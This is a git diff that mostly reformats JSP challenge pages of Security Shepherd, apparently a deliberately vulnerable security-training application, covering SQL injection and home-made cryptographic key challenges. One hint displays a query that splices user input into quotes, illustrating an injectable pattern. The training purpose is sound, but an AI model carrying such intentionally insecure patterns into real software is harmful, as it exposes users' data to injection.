-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ String levelName = "SQL Injection Escaping Challenge";
+ String levelHash = "8c3c35c30cdbbb73b7be3a4f8587aa9d88044dc43e248984a252c6e861f673d4";
+ //Translation Stuff
+ Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.injection." + levelHash, locale);
+ //Used more than once translations
+ String i18nLevelName = bundle.getString("challenge.challengeName");
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+ if (request.getSession() != null)
+ {
+ 	HttpSession ses = request.getSession();
+ 	//Getting CSRF Token from client
+ 	Cookie tokenCookie = null;
+ 	try
+ 	{
+ 		tokenCookie = Validate.getToken(request.getCookies());
+ 	}
+ 	catch(Exception htmlE)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ 	}
+ 	// validateSession ensures a valid session, and valid role credentials
+ 	// If tokenCookie == null, then the page is not going to continue loading
+ 	if (Validate.validateSession(ses) && tokenCookie != null)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 
 %>
 
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= i18nLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= i18nLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= i18nLevelName %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.description") %>
-    <div id="hint" style="display: none;">
-        <h2 class="title"><%= bundle.getString("challenge.hint") %>
-        </h2>
-        <%= bundle.getString("challenge.hint.description") %>
-        <br/> <br/>
-        <div>
-            SELECT * FROM customers WHERE customerId = '<a id="userContent"></a>'
-        </div>
-        <br/> <br/>
-    </div>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= i18nLevelName %></h2>
+		<p>
+			<%= bundle.getString("challenge.description") %>
+		<div id="hint" style="display: none;">
+			<h2 class="title"><%= bundle.getString("challenge.hint") %></h2>
+			<%= bundle.getString("challenge.hint.description") %>
+			<br /> <br />
+			<div>
+				SELECT * FROM customers WHERE customerId = '<a id="userContent"></a>'
+			</div>
+			<br /> <br />
+		</div>
 
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td><%= bundle.getString("challenge.form.pleaseEnter") %>
-                </td>
-            </tr>
-            <tr>
-                <td><input style="width: 400px;" id="aUserId" type="text"
-                           autocomplete="off"/></td>
-            </tr>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("challenge.form.button.value") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>...
-                    </p>
-                    <div style="display: none;" id="hintButton">
-                        <input type="button" value="<%= bundle.getString("sign.hint") %>"
-                               id="theHintButton"/>
-                    </div>
-                </td>
-            </tr>
-        </table>
-    </form>
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td><%= bundle.getString("challenge.form.pleaseEnter") %></td>
+				</tr>
+				<tr>
+					<td><input style="width: 400px;" id="aUserId" type="text"
+						autocomplete="off" /></td>
+				</tr>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("challenge.form.button.value") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>...
+						</p>
+						<div style="display: none;" id="hintButton">
+							<input type="button" value="<%= bundle.getString("sign.hint") %>"
+								id="theHintButton" />
+						</div>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
-    var counter = 0;
-    $("#leForm").submit(function () {
-        counter = counter + 1;
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        $("#userContent").text($("#aUserId").val());
-        var theName = $("#aUserId").val();
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "8c3c35c30cdbbb73b7be3a4f8587aa9d88044dc43e248984a252c6e861f673d4",
-                data: {
-                    aUserId: theName
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                    if (counter == 3) {
-                        $("#hintButton").show("slow");
-                    }
-                });
-            });
-        });
-    });
-    $("#aUserId").change(function () {
-        $("#userContent").text($(this).val());
-    }).change();
-    $("#theHintButton").click(function () {
-        $("#hintButton").hide("fast", function () {
-            $("#hint").show("fast");
-        });
-    });
-    ;
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
+			var counter = 0;
+			$("#leForm").submit(function(){
+				counter = counter + 1;
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				$("#userContent").text($("#aUserId").val());
+				var theName = $("#aUserId").val();
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "8c3c35c30cdbbb73b7be3a4f8587aa9d88044dc43e248984a252c6e861f673d4",
+						data: {
+							aUserId: theName
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+							if (counter == 3)
+							{
+								$("#hintButton").show("slow");
+							}
+						});
+					});
+				});
+			});
+			$("#aUserId").change(function () {
+				$("#userContent").text($(this).val());
+			}).change();
+			$("#theHintButton").click(function() {
+				$("#hintButton").hide("fast", function(){
+					$("#hint").show("fast");
+				});
+			});;
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62.jsp b/src/main/webapp/challenges/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62.jsp
index 553550112..c83e45093 100644
--- a/src/main/webapp/challenges/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62.jsp
+++ b/src/main/webapp/challenges/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62.jsp
@@ -1,194 +1,196 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
+/**
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ *
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ *
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
+ *
+ * @author Mark Denihan
+ */
 //No Quotes In level Name
-    String levelName = "SQL Injection Challenge 5";
+String levelName = "SQL Injection Challenge 5";
 //Alphanumeric Only
-    String levelHash = "8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62";
+String levelHash = "8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62";
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.injection." + levelHash, locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.injection." + levelHash, locale);
 //Used more than once translations
-    String i18nLevelName = bundle.getString("challenge.challengeName");
+String i18nLevelName = bundle.getString("challenge.challengeName");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= i18nLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= i18nLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= i18nLevelName %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.description") %>
-        <br/> <br/>
-    <h3><%= bundle.getString("challenge.description.h3") %>
-    </h3>
-    <%= bundle.getString("challenge.description.p1") %>
-    <%= bundle.getString("challenge.description.p2") %>
-    <br/> <br/>
-    <form id="leForm" action="javascript:;">
-        <table>
-            <!-- Header -->
-            <tr>
-                <th><%= bundle.getString("challenge.form.picture") %>
-                </th>
-                <th><%= bundle.getString("challenge.form.cost") %>
-                </th>
-                <th><%= bundle.getString("challenge.form.quantity") %>
-                </th>
-            </tr>
-            <!-- Apple Row -->
-            <tr>
-                <td><img width="50px" height="50px"
-                         src="<%= levelHash %>/apple.jpg"/></td>
-                <td><%= bundle.getString("challenge.form.45") %>
-                </td>
-                <td><input type="text" style="width: 50px" value="0"
-                           id="numberOfApples" autocomplete="off"/>
-            </tr>
-            <!-- Banana Row -->
-            <tr>
-                <td><img width="50px" height="50px"
-                         src="<%= levelHash %>/banana.jpg"/></td>
-                <td><%= bundle.getString("challenge.form.15") %>
-                </td>
-                <td><input type="text" style="width: 50px" value="0"
-                           id="numberOfBananas" autocomplete="off"/>
-            </tr>
-            <!-- Orange Row -->
-            <tr>
-                <td><img width="50px" height="50px"
-                         src="<%= levelHash %>/orange.jpg"/></td>
-                <td><%= bundle.getString("challenge.form.3000") %>
-                </td>
-                <td><input type="text" style="width: 50px" value="0"
-                           id="numberOfOranges" autocomplete="off"/>
-            </tr>
-            <!-- Pineapple Row -->
-            <tr>
-                <td><img width="50px" height="50px"
-                         src="<%= levelHash %>/pineapple.png"/></td>
-                <td><%= bundle.getString("challenge.form.30") %>
-                </td>
-                <td><input type="text" style="width: 50px" value="0"
-                           id="numberOfPineapples" autocomplete="off"/>
-            </tr>
-        </table>
-        <%= bundle.getString("challenge.form.pleaseSelect") %>
-        <table>
-            <tr>
-                <td><%= bundle.getString("challenge.form.couponCode") %>:</td>
-                <td><input type="text" id="couponCode" autocomplete="off"/></td>
-            </tr>
-            <tr>
-                <td colspons=2>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("challenge.form.button.value") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>...
-                    </p>
-                </td>
-            </tr>
-        </table>
-    </form>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= i18nLevelName %></h2>
+		<p>
+			<%= bundle.getString("challenge.description") %>
+			<br /> <br />
+		<h3><%= bundle.getString("challenge.description.h3") %></h3>
+		<%= bundle.getString("challenge.description.p1") %>
+		<%= bundle.getString("challenge.description.p2") %>
+		<br /> <br />
+		<form id="leForm" action="javascript:;">
+			<table>
+				<!-- Header -->
+				<tr>
+					<th><%= bundle.getString("challenge.form.picture") %></th>
+					<th><%= bundle.getString("challenge.form.cost") %></th>
+					<th><%= bundle.getString("challenge.form.quantity") %></th>
+				</tr>
+				<!-- Apple Row -->
+				<tr>
+					<td><img width="50px" height="50px"
+						src="<%= levelHash %>/apple.jpg" /></td>
+					<td><%= bundle.getString("challenge.form.45") %></td>
+					<td><input type="text" style="width: 50px" value="0"
+						id="numberOfApples" autocomplete="off" />
+				</tr>
+				<!-- Banana Row -->
+				<tr>
+					<td><img width="50px" height="50px"
+						src="<%= levelHash %>/banana.jpg" /></td>
+					<td><%= bundle.getString("challenge.form.15") %></td>
+					<td><input type="text" style="width: 50px" value="0"
+						id="numberOfBananas" autocomplete="off" />
+				</tr>
+				<!-- Orange Row -->
+				<tr>
+					<td><img width="50px" height="50px"
+						src="<%= levelHash %>/orange.jpg" /></td>
+					<td><%= bundle.getString("challenge.form.3000") %></td>
+					<td><input type="text" style="width: 50px" value="0"
+						id="numberOfOranges" autocomplete="off" />
+				</tr>
+				<!-- Pineapple Row -->
+				<tr>
+					<td><img width="50px" height="50px"
+						src="<%= levelHash %>/pineapple.png" /></td>
+					<td><%= bundle.getString("challenge.form.30") %></td>
+					<td><input type="text" style="width: 50px" value="0"
+						id="numberOfPineapples" autocomplete="off" />
+				</tr>
+			</table>
+			<%= bundle.getString("challenge.form.pleaseSelect") %>
+			<table>
+				<tr>
+					<td><%= bundle.getString("challenge.form.couponCode") %>:</td>
+					<td><input type="text" id="couponCode" autocomplete="off" /></td>
+				</tr>
+				<tr>
+					<td colspons=2>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("challenge.form.button.value") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>...
+						</p>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
-    $("#leForm").submit(function () {
-        var thePineappleAmount = $("#numberOfPineapples").val();
-        var theOrangeAmount = $("#numberOfOranges").val();
-        var theAppleAmount = $("#numberOfApples").val();
-        var theBananaAmount = $("#numberOfBananas").val();
-        var theCouponCode = $("#couponCode").val();
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    pineappleAmount: thePineappleAmount,
-                    orangeAmount: theOrangeAmount,
-                    appleAmount: theAppleAmount,
-                    bananaAmount: theBananaAmount,
-                    couponCode: theCouponCode
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
-</script>
-<script src="<%= levelHash %>/couponCheck.js"></script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
+			$("#leForm").submit(function(){
+				var thePineappleAmount = $("#numberOfPineapples").val();
+				var theOrangeAmount = $("#numberOfOranges").val();
+				var theAppleAmount = $("#numberOfApples").val();
+				var theBananaAmount = $("#numberOfBananas").val();
+				var theCouponCode = $("#couponCode").val();
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							pineappleAmount: thePineappleAmount, 
+							orangeAmount: theOrangeAmount,
+							appleAmount: theAppleAmount, 
+							bananaAmount: theBananaAmount,
+							couponCode: theCouponCode
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+		</script>
+	<script src="<%= levelHash %>/couponCheck.js"></script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/9e5ed059b23632c8801d95621fa52071b2eb211d8c044dde6d2f4b89874a7bc4.jsp b/src/main/webapp/challenges/9e5ed059b23632c8801d95621fa52071b2eb211d8c044dde6d2f4b89874a7bc4.jsp
index 1fe771d41..3985901ac 100644
--- a/src/main/webapp/challenges/9e5ed059b23632c8801d95621fa52071b2eb211d8c044dde6d2f4b89874a7bc4.jsp
+++ b/src/main/webapp/challenges/9e5ed059b23632c8801d95621fa52071b2eb211d8c044dde6d2f4b89874a7bc4.jsp
@@ -1,164 +1,170 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java"
-         import="utils.*, servlets.module.challenge.BrokenCryptoHomeMade"
-         errorPage="" %>
+	language="java"
+	import="utils.*, servlets.module.challenge.BrokenCryptoHomeMade"
+	errorPage=""%>
 <%@ page
-        import="java.util.Locale,java.util.ResourceBundle,java.util.ArrayList,java.util.List,org.owasp.encoder.Encode" %>
+	import="java.util.Locale,java.util.ResourceBundle,java.util.ArrayList,java.util.List,org.owasp.encoder.Encode"%>
 
 <%
-    /**
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
+	/**
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Mark Denihan
+ */
 //No Quotes In level Name
-    String levelName = "Insecure Cryptographic Storage Home Made Keys";
+String levelName = "Insecure Cryptographic Storage Home Made Keys";
 //Alphanumeric Only
-    String levelHash = "9e5ed059b23632c8801d95621fa52071b2eb211d8c044dde6d2f4b89874a7bc4";
+String levelHash = "9e5ed059b23632c8801d95621fa52071b2eb211d8c044dde6d2f4b89874a7bc4"; 
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.insecureCryptoStorage.insecureCryptoHomeMade", locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.insecureCryptoStorage.insecureCryptoHomeMade", locale);
 //Used more than once translations
-    String i18nChallengeName = bundle.getString("challenge.challengeName");
+String i18nChallengeName = bundle.getString("challenge.challengeName");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            String csrfToken = Encode.forHtml(tokenCookie.getValue());
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-            BrokenCryptoHomeMade.initLists();
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		String csrfToken = Encode.forHtml(tokenCookie.getValue());
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+		BrokenCryptoHomeMade.initLists();
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%=levelName%>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%=levelName%></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<div>
-    <script type="text/javascript" src="../js/jquery.js"></script>
-    <script type="text/javascript"
-            src="../js/clipboard-js/clipboard.min.js"></script>
-    <script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-    <script type="text/javascript"
-            src="../js/clipboard-js/clipboard-events.js"></script>
-    <div id="contentDiv">
-        <h2 class="title"><%=levelName%>
-        </h2>
-        <p>
-                <%=bundle.getString("challenge.whatToDo")%>
-            <br/> <br/>
-        <h1 class='title'><%=bundle.getString("badCrypto.title")%>
-        </h1>
-        <table>
-            <tr>
-                <th>Challenge Name</th>
-                <th>Base Key</th>
-                <th>Your User Specific Solution</th>
-            </tr>
-            <%
-                for (int i = 0; i < BrokenCryptoHomeMade.challenges.size(); i++) {
-            %>
-            <tr>
-                <td><%= BrokenCryptoHomeMade.challenges.get(i).get(0) %>
-                </td>
-                <td><%= BrokenCryptoHomeMade.challenges.get(i).get(1) %>
-                </td>
-                <% if (!BrokenCryptoHomeMade.challenges.get(i).get(0).equalsIgnoreCase("This Challenge")) { %>
-                <td><%= BrokenCryptoHomeMade.generateUserSolution(BrokenCryptoHomeMade.challenges.get(i).get(1), ses.getAttribute("userName").toString()) %>
-                </td>
-                <% } else { %>
-                <td>
-                    <form action="javascript:;" id="submitAnswerForm">
+	<div>
+		<script type="text/javascript" src="../js/jquery.js"></script>
+		<script type="text/javascript"
+			src="../js/clipboard-js/clipboard.min.js"></script>
+		<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+		<script type="text/javascript"
+			src="../js/clipboard-js/clipboard-events.js"></script>
+		<div id="contentDiv">
+			<h2 class="title"><%=levelName%></h2>
+			<p>
+				<%=bundle.getString("challenge.whatToDo")%>
+				<br /> <br />
+			<h1 class='title'><%=bundle.getString("badCrypto.title")%></h1>
+			<table>
+				<tr>
+					<th>Challenge Name</th>
+					<th>Base Key</th>
+					<th>Your User Specific Solution</th>
+				</tr>
+				<%
+					for(int i = 0; i < BrokenCryptoHomeMade.challenges.size(); i++)
+					{
+						%>
+				<tr>
+					<td><%= BrokenCryptoHomeMade.challenges.get(i).get(0) %></td>
+					<td><%= BrokenCryptoHomeMade.challenges.get(i).get(1) %></td>
+					<% if(!BrokenCryptoHomeMade.challenges.get(i).get(0).equalsIgnoreCase("This Challenge")) { %>
+					<td><%= BrokenCryptoHomeMade.generateUserSolution(BrokenCryptoHomeMade.challenges.get(i).get(1), ses.getAttribute("userName").toString()) %></td>
+					<% } else { %>
+					<td>
+						<form action="javascript:;" id="submitAnswerForm">
 							<textarea id='theSubmission' rows=2
